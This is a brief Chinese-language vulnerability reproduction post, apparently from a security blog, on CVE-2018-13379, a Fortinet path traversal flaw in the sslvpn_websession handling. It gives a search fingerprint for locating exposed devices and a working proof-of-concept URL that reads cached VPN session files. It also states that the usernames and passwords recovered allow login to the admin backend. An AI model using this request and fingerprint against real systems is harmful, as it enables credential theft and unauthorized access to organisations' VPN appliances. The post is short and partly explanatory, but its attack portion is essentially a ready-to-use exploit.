Fortinet FortiWeb sslvpn_websession 路径遍历漏洞 #CVE-2018-13379

漏洞描述

Fortinet FortiWeb路径遍历漏洞,攻击者通过漏洞可以获取缓存信息,登录服务器。

漏洞影响

Fortinet FortiWeb

网络测绘

body=”FortiToken clock drift detected”

漏洞复现

登录页面

20240326103926702-png (15)

验证POC

/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession

20240326104018950-png (16)

获取的账号密码即可登录后台

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容